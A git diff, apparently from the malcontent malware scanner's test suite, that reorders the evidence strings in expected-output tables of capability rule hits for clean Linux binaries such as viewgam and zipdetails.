[rm on-chain due to too low of a transa](https://github.com/search?q=rm+on-chain+due+to+too+low+of+a+transa&type=code) | | LOW | [fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#py_open) | opens files | [open(](https://github.com/search?q=open%28&type=code) | -| LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read) | reads files | [ReadFile](https://github.com/search?q=ReadFile&type=code)
[os.(*File).Read](https://github.com/search?q=os.%28%2AFile%29.Read&type=code) | -| LOW | [fs/file/rename](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-rename.yara#explicit_rename) | renames files | [MoveFile](https://github.com/search?q=MoveFile&type=code)
[os.rename](https://github.com/search?q=os.rename&type=code) | +| LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read) | reads files | [os.(*File).Read](https://github.com/search?q=os.%28%2AFile%29.Read&type=code)
[ReadFile](https://github.com/search?q=ReadFile&type=code) | +| LOW | [fs/file/rename](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-rename.yara#explicit_rename) | renames files | [os.rename](https://github.com/search?q=os.rename&type=code)
[MoveFile](https://github.com/search?q=MoveFile&type=code) | | LOW | [fs/file/stat](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-stat.yara#npm_stat) | access filesystem metadata | [fs.statFile](https://github.com/search?q=fs.statFile&type=code) | -| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [WriteFile](https://github.com/search?q=WriteFile&type=code)
[writeCacheFile](https://github.com/search?q=writeCacheFile&type=code)
[writeFilePatchHeader](https://github.com/search?q=writeFilePatchHeader&type=code)
[writeFileToArchive](https://github.com/search?q=writeFileToArchive&type=code)
[writeFilestat](https://github.com/search?q=writeFilestat&type=code)
[writeRawFile](https://github.com/search?q=writeRawFile&type=code)
[writerFile](https://github.com/search?q=writerFile&type=code) | +| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [writeFilePatchHeader](https://github.com/search?q=writeFilePatchHeader&type=code)
[writeFileToArchive](https://github.com/search?q=writeFileToArchive&type=code)
[writeCacheFile](https://github.com/search?q=writeCacheFile&type=code)
[writeFilestat](https://github.com/search?q=writeFilestat&type=code)
[writeRawFile](https://github.com/search?q=writeRawFile&type=code)
[writerFile](https://github.com/search?q=writerFile&type=code)
[WriteFile](https://github.com/search?q=WriteFile&type=code) | | LOW | [fs/link_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-create.yara#linkat) | May create hard file links | [linkat](https://github.com/search?q=linkat&type=code) | | LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | | LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | -| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/apache/mime.typesgzip](https://github.com/search?q=%2Fetc%2Fapache%2Fmime.typesgzip&type=code)
[/etc/gitconfigempty](https://github.com/search?q=%2Fetc%2Fgitconfigempty&type=code)
[/etc/hosts.localhostgetsockoptnetlink](https://github.com/search?q=%2Fetc%2Fhosts.localhostgetsockoptnetlink&type=code)
[/etc/httpd/conf/mime.typesmime](https://github.com/search?q=%2Fetc%2Fhttpd%2Fconf%2Fmime.typesmime&type=code)
[/etc/mdns.allow/etc/mime.types](https://github.com/search?q=%2Fetc%2Fmdns.allow%2Fetc%2Fmime.types&type=code)
[/etc/nsswitch.confinvalid](https://github.com/search?q=%2Fetc%2Fnsswitch.confinvalid&type=code)
[/etc/pki/ca-trust/extracted/pem/tls-c](https://github.com/search?q=%2Fetc%2Fpki%2Fca-trust%2Fextracted%2Fpem%2Ftls-c&type=code)
[/etc/pki/tls/cacert.peminvalid](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcacert.peminvalid&type=code)
[/etc/pki/tls/certs/ca-bundle.crtx](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcerts%2Fca-bundle.crtx&type=code)
[/etc/pki/tls/certsperforming](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcertsperforming&type=code)
[/etc/protocolsunknown](https://github.com/search?q=%2Fetc%2Fprotocolsunknown&type=code)
[/etc/resolv.confnon-](https://github.com/search?q=%2Fetc%2Fresolv.confnon-&type=code)
[/etc/servicesdal](https://github.com/search?q=%2Fetc%2Fservicesdal&type=code)
[/etc/ssh/ssh](https://github.com/search?q=%2Fetc%2Fssh%2Fssh&type=code)
[/etc/ssl/ca-bundle.pemx](https://github.com/search?q=%2Fetc%2Fssl%2Fca-bundle.pemx&type=code)
[/etc/ssl/cert.peminvalid](https://github.com/search?q=%2Fetc%2Fssl%2Fcert.peminvalid&type=code)
[/etc/ssl/certs/ca-certificates.crtadd](https://github.com/search?q=%2Fetc%2Fssl%2Fcerts%2Fca-certificates.crtadd&type=code)
[/etc/ssl/certsinvalid](https://github.com/search?q=%2Fetc%2Fssl%2Fcertsinvalid&type=code)
[/etc/zoneinfoparsing](https://github.com/search?q=%2Fetc%2Fzoneinfoparsing&type=code) | +| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [mount](https://github.com/search?q=mount&type=code)
[-o](https://github.com/search?q=-o&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/hosts.localhostgetsockoptnetlink](https://github.com/search?q=%2Fetc%2Fhosts.localhostgetsockoptnetlink&type=code)
[/etc/pki/ca-trust/extracted/pem/tls-c](https://github.com/search?q=%2Fetc%2Fpki%2Fca-trust%2Fextracted%2Fpem%2Ftls-c&type=code)
[/etc/ssl/certs/ca-certificates.crtadd](https://github.com/search?q=%2Fetc%2Fssl%2Fcerts%2Fca-certificates.crtadd&type=code)
[/etc/pki/tls/certs/ca-bundle.crtx](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcerts%2Fca-bundle.crtx&type=code)
[/etc/httpd/conf/mime.typesmime](https://github.com/search?q=%2Fetc%2Fhttpd%2Fconf%2Fmime.typesmime&type=code)
[/etc/mdns.allow/etc/mime.types](https://github.com/search?q=%2Fetc%2Fmdns.allow%2Fetc%2Fmime.types&type=code)
[/etc/pki/tls/cacert.peminvalid](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcacert.peminvalid&type=code)
[/etc/pki/tls/certsperforming](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcertsperforming&type=code)
[/etc/apache/mime.typesgzip](https://github.com/search?q=%2Fetc%2Fapache%2Fmime.typesgzip&type=code)
[/etc/nsswitch.confinvalid](https://github.com/search?q=%2Fetc%2Fnsswitch.confinvalid&type=code)
[/etc/ssl/cert.peminvalid](https://github.com/search?q=%2Fetc%2Fssl%2Fcert.peminvalid&type=code)
[/etc/ssl/ca-bundle.pemx](https://github.com/search?q=%2Fetc%2Fssl%2Fca-bundle.pemx&type=code)
[/etc/protocolsunknown](https://github.com/search?q=%2Fetc%2Fprotocolsunknown&type=code)
[/etc/ssl/certsinvalid](https://github.com/search?q=%2Fetc%2Fssl%2Fcertsinvalid&type=code)
[/etc/resolv.confnon-](https://github.com/search?q=%2Fetc%2Fresolv.confnon-&type=code)
[/etc/zoneinfoparsing](https://github.com/search?q=%2Fetc%2Fzoneinfoparsing&type=code)
[/etc/gitconfigempty](https://github.com/search?q=%2Fetc%2Fgitconfigempty&type=code)
[/etc/servicesdal](https://github.com/search?q=%2Fetc%2Fservicesdal&type=code)
[/etc/ssh/ssh](https://github.com/search?q=%2Fetc%2Fssh%2Fssh&type=code) | | LOW | [fs/path/etc_resolv.conf](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc-resolv.conf.yara#etc_resolv_conf) | accesses DNS resolver configuration | [/etc/resolv.conf](https://github.com/search?q=%2Fetc%2Fresolv.conf&type=code) | | LOW | [fs/path/file_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/file-url.yara#file_url) | file url | [file:///tmp](https://github.com/search?q=file%3A%2F%2F%2Ftmp&type=code) | -| LOW | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/trufflehog/3.82.6/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftrufflehog%2F3.82.6%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code) | -| LOW | [fs/path/home_config](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home-config.yara#home_config_path) | path reference within ~/.config | [GRITY_ONLY.config/gcloudf32](https://github.com/search?q=GRITY_ONLY.config%2Fgcloudf32&type=code)
[NumberLine.config/git/configunknown channel](https://github.com/search?q=NumberLine.config%2Fgit%2Fconfigunknown+channel&type=code) | +| LOW | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/trufflehog/3.82.6/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftrufflehog%2F3.82.6%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code) | +| LOW | [fs/path/home_config](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home-config.yara#home_config_path) | path reference within ~/.config | [NumberLine.config/git/configunknown channel](https://github.com/search?q=NumberLine.config%2Fgit%2Fconfigunknown+channel&type=code)
[GRITY_ONLY.config/gcloudf32](https://github.com/search?q=GRITY_ONLY.config%2Fgcloudf32&type=code) | | LOW | [fs/path/usr_bin](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-bin.yara#usr_bin_path) | path reference within /usr/bin | [/usr/bin/envcomments_pop_1comments_pop_2c](https://github.com/search?q=%2Fusr%2Fbin%2Fenvcomments_pop_1comments_pop_2c&type=code) | | LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run/slapd/ldapiTLS](https://github.com/search?q=%2Fvar%2Frun%2Fslapd%2FldapiTLS&type=code) | | LOW | [fs/swap/off](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/swap/swap-off.yara#swapoff) | stop swapping to a file/device | [swapoff](https://github.com/search?q=swapoff&type=code) | | LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | | LOW | [fs/tempdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir.yara#tempdir) | looks up location of temp directory | [TMPDIR](https://github.com/search?q=TMPDIR&type=code) | -| LOW | [fs/tempdir/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TEMP.yara#temp) | temp | [TEMP](https://github.com/search?q=TEMP&type=code)
[getenv](https://github.com/search?q=getenv&type=code)
[temp](https://github.com/search?q=temp&type=code) | +| LOW | [fs/tempdir/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TEMP.yara#temp) | temp | [getenv](https://github.com/search?q=getenv&type=code)
[TEMP](https://github.com/search?q=TEMP&type=code)
[temp](https://github.com/search?q=temp&type=code) | | LOW | [fs/tempdir/TMPDIR](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TMPDIR.yara#TMPDIR) | TMPDIR | [TMPDIR](https://github.com/search?q=TMPDIR&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [fs/tempdir/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir-create.yara#mkdtemp) | creates temporary directory | [temp dir](https://github.com/search?q=temp+dir&type=code) | | LOW | [fs/tempfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile.yara#mktemp) | creates temporary files | [createTempFile](https://github.com/search?q=createTempFile&type=code)
[temp file](https://github.com/search?q=temp+file&type=code)
[tmpfile](https://github.com/search?q=tmpfile&type=code) | | LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | | LOW | [hw/wireless](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/wireless.yara#bssid) | wireless network base station ID | [BSSID](https://github.com/search?q=BSSID&type=code) | -| LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [CNAMEResource](https://github.com/search?q=CNAMEResource&type=code)
[SetEDNS0](https://github.com/search?q=SetEDNS0&type=code)
[dnsmessage](https://github.com/search?q=dnsmessage&type=code) | +| LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [CNAMEResource](https://github.com/search?q=CNAMEResource&type=code)
[dnsmessage](https://github.com/search?q=dnsmessage&type=code)
[SetEDNS0](https://github.com/search?q=SetEDNS0&type=code) | | LOW | [net/dns/servers](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local) | Examines local DNS servers | [CNAMEResource](https://github.com/search?q=CNAMEResource&type=code) | | LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | | LOW | [net/ftp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ftp/ftp.yara#ftp) | File Transfer Protocol (FTP) | [ftp.Dial](https://github.com/search?q=ftp.Dial&type=code) | @@ -168,7 +168,7 @@ | LOW | [net/http/auth](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/auth.yara#http_auth) | makes HTTP requests with Bearer authentication | [WWW-Authenticate](https://github.com/search?q=WWW-Authenticate&type=code)
[Www-Authenticate](https://github.com/search?q=Www-Authenticate&type=code)
[www-authenticate](https://github.com/search?q=www-authenticate&type=code) | | LOW | [net/http/oauth2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/oauth2.yara#oauth2) | supports OAuth2 | [OAuth 2](https://github.com/search?q=OAuth+2&type=code)
[oauth2](https://github.com/search?q=oauth2&type=code) | | LOW | [net/http/proxy](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/proxy.yara#proxy_auth) | [use HTTP proxy that requires authentication](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Proxy-Authorization) | [Proxy-Authorization](https://github.com/search?q=Proxy-Authorization&type=code) | -| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code)
[Referer](https://github.com/search?q=Referer&type=code)
[User-Agent](https://github.com/search?q=User-Agent&type=code)
[http.get](https://github.com/search?q=http.get&type=code)
[httpRequest](https://github.com/search?q=httpRequest&type=code) | +| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [httpRequest](https://github.com/search?q=httpRequest&type=code)
[User-Agent](https://github.com/search?q=User-Agent&type=code)
[http.get](https://github.com/search?q=http.get&type=code)
[HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code)
[Referer](https://github.com/search?q=Referer&type=code) | | LOW | [net/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip.yara#packets) | access the internet | [invalid packet](https://github.com/search?q=invalid+packet&type=code) | | LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) | | LOW | [net/ip/resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-resolve.yara#gethostbyaddr) | [resolves network hosts via IP address](https://linux.die.net/man/3/gethostbyaddr) | [gethostbyaddr](https://github.com/search?q=gethostbyaddr&type=code) | @@ -177,13 +177,13 @@ | LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | | LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | | LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvfrom](https://github.com/search?q=recvfrom&type=code)
[recvmsg](https://github.com/search?q=recvmsg&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [_send](https://github.com/search?q=_send&type=code)
[sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code)
[_send](https://github.com/search?q=_send&type=code) | | LOW | [net/tcp/grpc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/grpc.yara#grpc) | Uses the gRPC Remote Procedure Call framework | [gRPC](https://github.com/search?q=gRPC&type=code) | | LOW | [net/udp/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-receive.yara#udp_listen) | Listens for UDP responses | [ReadFromUDP](https://github.com/search?q=ReadFromUDP&type=code)
[listenUDP](https://github.com/search?q=listenUDP&type=code) | -| LOW | [net/udp/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-send.yara#udp_send) | Sends UDP packets | [DialUDP](https://github.com/search?q=DialUDP&type=code)
[WriteMsgUDP](https://github.com/search?q=WriteMsgUDP&type=code) | +| LOW | [net/udp/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-send.yara#udp_send) | Sends UDP packets | [WriteMsgUDP](https://github.com/search?q=WriteMsgUDP&type=code)
[DialUDP](https://github.com/search?q=DialUDP&type=code) | | LOW | [net/url/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/parse.yara#url_handle) | Handles URL strings | [RequestURI](https://github.com/search?q=RequestURI&type=code) | | LOW | [os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#get_env_val) | Retrieve environment variable values | [env.ANSIC](https://github.com/search?q=env.ANSIC&type=code)
[env.RGBC](https://github.com/search?q=env.RGBC&type=code) | -| LOW | [os/fd/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [sendfile](https://github.com/search?q=sendfile&type=code)
[syscall.Sendfile](https://github.com/search?q=syscall.Sendfile&type=code) | +| LOW | [os/fd/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [syscall.Sendfile](https://github.com/search?q=syscall.Sendfile&type=code)
[sendfile](https://github.com/search?q=sendfile&type=code) | | LOW | [os/kernel/key_management](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/key-management.yara#syscall_keyctl) | kernel key management facility | [keyctl](https://github.com/search?q=keyctl&type=code) | | LOW | [os/kernel/netlink](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/netlink.yara#netlink) | communicate with kernel services | [netlink](https://github.com/search?q=netlink&type=code) | | LOW | [privesc/setuid](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/setuid.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/viewgam.md b/tests/linux/clean/viewgam.md index 54c36d66d..2f31aa5e8 100644 --- a/tests/linux/clean/viewgam.md +++ b/tests/linux/clean/viewgam.md @@ -2,12 +2,12 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | +| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code)
[](https://github.com/search?q=%3Chtml%3E&type=code) | | MEDIUM | [exec/script/activex](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/script/activex.yara#ActiveXObject) | Create an ActiveX object | [ActiveXObject](https://github.com/search?q=ActiveXObject&type=code) | -| MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [Download manager stalled](https://github.com/search?q=Download+manager+stalled&type=code)
[DownloadManager](https://github.com/search?q=DownloadManager&type=code)
[activeDownloads](https://github.com/search?q=activeDownloads&type=code)
[downloadCount--](https://github.com/search?q=downloadCount--&type=code)
[downloadStartTimer](https://github.com/search?q=downloadStartTimer&type=code)
[downloading](https://github.com/search?q=downloading&type=code)
[internalDownloadCount-](https://github.com/search?q=internalDownloadCount-&type=code)
[maxActiveDownloads](https://github.com/search?q=maxActiveDownloads&type=code)
[maxDownloads](https://github.com/search?q=maxDownloads&type=code)
[removeDownload](https://github.com/search?q=removeDownload&type=code)
[tryNextDownload](https://github.com/search?q=tryNextDownload&type=code)
[var downloadCallbacks](https://github.com/search?q=var+downloadCallbacks&type=code) | +| MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [Download manager stalled](https://github.com/search?q=Download+manager+stalled&type=code)
[internalDownloadCount-](https://github.com/search?q=internalDownloadCount-&type=code)
[var downloadCallbacks](https://github.com/search?q=var+downloadCallbacks&type=code)
[downloadStartTimer](https://github.com/search?q=downloadStartTimer&type=code)
[maxActiveDownloads](https://github.com/search?q=maxActiveDownloads&type=code)
[DownloadManager](https://github.com/search?q=DownloadManager&type=code)
[activeDownloads](https://github.com/search?q=activeDownloads&type=code)
[downloadCount--](https://github.com/search?q=downloadCount--&type=code)
[tryNextDownload](https://github.com/search?q=tryNextDownload&type=code)
[removeDownload](https://github.com/search?q=removeDownload&type=code)
[maxDownloads](https://github.com/search?q=maxDownloads&type=code)
[downloading](https://github.com/search?q=downloading&type=code) | | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WebSocket](https://github.com/search?q=WebSocket&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://examples.x3dom.org/crossdomain.xml](http://examples.x3dom.org/crossdomain.xml)
[http://philip.html5.org/x3d/ext](http://philip.html5.org/x3d/ext)
[http://www.w3.org/1999/XSL/x3dom.Transform](http://www.w3.org/1999/XSL/x3dom.Transform)
[http://www.w3.org/1999/xhtml](http://www.w3.org/1999/xhtml)
[http://www.w3.org/2001/XMLSchema](http://www.w3.org/2001/XMLSchema)
[http://www.web3d.org/specifications/x3d](http://www.web3d.org/specifications/x3d)
[http://www.web3d.org/x3d/specifications/ISO](http://www.web3d.org/x3d/specifications/ISO)
[http://www.x3dom.org/download/](http://www.x3dom.org/download/)
[http://www.x3dom.org/x3dom/src_mobile/x3dom.js](http://www.x3dom.org/x3dom/src_mobile/x3dom.js)
[http://x3dom.org/docs/latest/configuration.html](http://x3dom.org/docs/latest/configuration.html)
[http://x3dom.org/x3dom/doc/help/composedShader.html](http://x3dom.org/x3dom/doc/help/composedShader.html)
[https://github.com/x3dom/x3dom/tree/](https://github.com/x3dom/x3dom/tree/) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [http://](http://)
[https://](https://)
[x86_64](https://github.com/search?q=x86_64&type=code) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://x3dom.org/x3dom/doc/help/composedShader.html](http://x3dom.org/x3dom/doc/help/composedShader.html)
[http://x3dom.org/docs/latest/configuration.html](http://x3dom.org/docs/latest/configuration.html)
[http://www.x3dom.org/x3dom/src_mobile/x3dom.js](http://www.x3dom.org/x3dom/src_mobile/x3dom.js)
[http://www.web3d.org/x3d/specifications/ISO](http://www.web3d.org/x3d/specifications/ISO)
[http://www.w3.org/1999/XSL/x3dom.Transform](http://www.w3.org/1999/XSL/x3dom.Transform)
[http://examples.x3dom.org/crossdomain.xml](http://examples.x3dom.org/crossdomain.xml)
[http://www.web3d.org/specifications/x3d](http://www.web3d.org/specifications/x3d)
[https://github.com/x3dom/x3dom/tree/](https://github.com/x3dom/x3dom/tree/)
[http://www.w3.org/2001/XMLSchema](http://www.w3.org/2001/XMLSchema)
[http://philip.html5.org/x3d/ext](http://philip.html5.org/x3d/ext)
[http://www.x3dom.org/download/](http://www.x3dom.org/download/)
[http://www.w3.org/1999/xhtml](http://www.w3.org/1999/xhtml) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86_64](https://github.com/search?q=x86_64&type=code) | | LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | LOW | [data/encoding/json_decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-decode.yara#jsondecode) | Decodes JSON messages | [JSON.parse](https://github.com/search?q=JSON.parse&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | diff --git a/tests/linux/clean/zipdetails.md b/tests/linux/clean/zipdetails.md index d9e6faec6..6f9ea572c 100644 --- a/tests/linux/clean/zipdetails.md +++ b/tests/linux/clean/zipdetails.md @@ -2,15 +2,15 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| MEDIUM | [anti-static/obfuscation/bitwise](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/bitwise.yara#bidirectional_bitwise_math) | [uses bitwise math in both directions](https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection) | [1 << 0](https://github.com/search?q=1+%3C%3C+0&type=code)
[1 << 11](https://github.com/search?q=1+%3C%3C+11&type=code)
[1 << 3](https://github.com/search?q=1+%3C%3C+3&type=code)
[1 << 4](https://github.com/search?q=1+%3C%3C+4&type=code)
[1 << 5](https://github.com/search?q=1+%3C%3C+5&type=code)
[1 << 6](https://github.com/search?q=1+%3C%3C+6&type=code)
[2 << 1](https://github.com/search?q=2+%3C%3C+1&type=code)
[dt << 1](https://github.com/search?q=dt+%3C%3C+1&type=code)
[dt >> 11](https://github.com/search?q=dt+%3E%3E+11&type=code)
[dt >> 16](https://github.com/search?q=dt+%3E%3E+16&type=code)
[dt >> 21](https://github.com/search?q=dt+%3E%3E+21&type=code)
[dt >> 25](https://github.com/search?q=dt+%3E%3E+25&type=code)
